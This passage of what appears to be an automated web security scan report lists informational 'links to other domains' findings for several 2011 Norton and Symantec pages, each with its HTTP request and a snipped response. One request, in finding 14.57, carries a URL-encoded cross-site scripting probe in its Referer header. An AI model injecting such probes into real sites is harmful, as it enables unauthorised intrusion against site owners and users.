<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support">Business Support</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales">Business Sales</a>
...[SNIP]...
<li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information">Corporate Information</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.53. http://us.norton.com/theme.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/theme.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/theme.jsp?themeid=nis_nav_2012&inid=us_hho_homepage_hero1_nisnav2012

The response contains the following links to other domains:

http://www.symantec.com/
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/globalsupport
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /theme.jsp?themeid=nis_nav_2012&inid=us_hho_homepage_hero1_nisnav2012 HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1331
Date: Fri, 09 Sep 2011 21:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39140

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Introducing Norton Internet Security 2012 and Norton Antivirus 2012</title>
<meta http-equiv="Content-Type" content
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
vice includes protection updates and new product features as available during the service period, subject to acceptance of the Symantec Agreement included with this product and available for review at <a href="http://www.symantec.com">www.symantec.com</a>
...[SNIP]...
c provides free 24x7 email, chat and phone support for a period of one year from initial product installation. NortonLive™ Services sold separately. For full details and to access support, go to <a href="http://www.symantec.com/globalsupport">www.symantec.com/globalsupport</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.54. http://us.norton.com/theme.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/theme.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/theme.jsp?themeid=protect_yourself

The response contains the following links to other domains:

http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget
http://www.nortoncybercrimeindex.mobi/
http://www.nortonfreetools.com/freePCCheckup/
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /theme.jsp?themeid=protect_yourself HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=3461
Date: Fri, 09 Sep 2011 21:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Norton Cybercrime Index - Free Download</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<div class="mainBdyWrapBdy" style="width:308px; height: 390px;">
                   <a target="_blank" href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget"> <img src="/content/en/us/home_homeoffice/images/theme/cci/CCI_-NortonPageDwnLoad-GadgetAgreeBtn.jpg">
...[SNIP]...
<br/>
                               <a target="_blank" href="http://www.nortoncybercrimeindex.mobi">http://www.nortoncybercrimeindex.mobi</a>
...[SNIP]...
<div class="mainBdyWrapBdy" style="width:306px; height:390px;">
                   <a href="http://www.nortonfreetools.com/freePCCheckup/"><img src="/content/en/us/home_homeoffice/images/theme/cci/Security-Scan-Button-blk-on-gld-303x52.jpg">
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.55. http://us.norton.com/theme4.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/theme4.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/theme4.jsp?themeid=free_tools_trials2

The response contains the following links to other domains:

http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget
http://security.symantec.com/nbrt/npe.asp?lcid=1033
http://www.facebook.com/apps/application.php?id=310877173418
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif
http://www.symantec.com/norton
http://www.symantec.com/norton/community/index.jsp
http://www.symantec.com/norton/support/index.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://security.symantec.com/sscv6/DownloadInstructions.asp
https://security.symantec.com/sscv6/WelcomePage.asp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /theme4.jsp?themeid=free_tools_trials2 HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1124
Date: Fri, 09 Sep 2011 21:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Download trials of Nortons Virus Protection and Spyware Remover Tools</title>
<meta http-equiv="Content-Type" conte
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<br/><a href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget" target="_blank">Try It</a>
...[SNIP]...
<h3><a href="https://security.symantec.com/sscv6/WelcomePage.asp">Norton Security Scan</a>
...[SNIP]...
<div class="cbType22"><a href="https://security.symantec.com/sscv6/DownloadInstructions.asp" target="_blank">Try It</a>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<br/> <a href="http://security.symantec.com/nbrt/npe.asp?lcid=1033">Try It</a>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<br /><a href="http://www.facebook.com/apps/application.php?id=310877173418" target="_blank">Try it</a>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<li><a href="http://www.symantec.com/norton">Norton Homepage</a>
...[SNIP]...
<li><a href="http://www.symantec.com/norton/community/index.jsp">Norton Forums</a>
...[SNIP]...
<li><a href="http://www.symantec.com/norton/support/index.jsp">Norton Support</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.56. http://www.symantec.com/business/products/categories.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/business/products/categories.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/business/products/categories.jsp?pcid=pcat_infrastruct_op

The response contains the following links to other domains:

http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=sym_bus_prod_lp
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html

Request

GET /business/products/categories.jsp?pcid=pcat_infrastruct_op HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315622485105-New%7C1336358485105%3B%20event69%3Devent69%7C1336358485107%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520purchasing%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fcategories.jsp%2525253Fpcid%2525253Dpcat_infrastruct_op%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 77466
Cache-Control: public, max-age=3563
Date: Fri, 09 Sep 2011 21:41:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Security, Backup & Archiving, Server Management, and Storage Software | Symantec Enterprise Products</title>
<m
...[SNIP]...
<div class="promoProdOneCol4Lft">
<a href="http://www.verisign.com/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=sym_bus_prod_lp"><img src="/content/en/us/enterprise/images/promo/b-verisign-promo.jpg" alt="Trust the Leader, VeriSign SSL Certificates, Buy Now" title="Trust the Leader, VeriSign SSL Certificates, Buy Now" class="
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.57. http://www.symantec.com/business/products/purchasing.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/business/products/purchasing.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.symantec.com/business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1

The response contains the following links to other domains:

http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html

Request

GET /business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622085200-New%7C1336358085200%3B%20event69%3Devent69%7C1336358085202%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fpurchasing.jsp%2525253Fpcid%2525253Dpcat_info_risk_comp%25252526pvid%2525253Dfds_1%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 52358
Cache-Control: public, max-age=3599
Date: Fri, 09 Sep 2011 21:34:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>VeriSign Identity Protection Fraud Detection Service: Purchasing Options - S
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
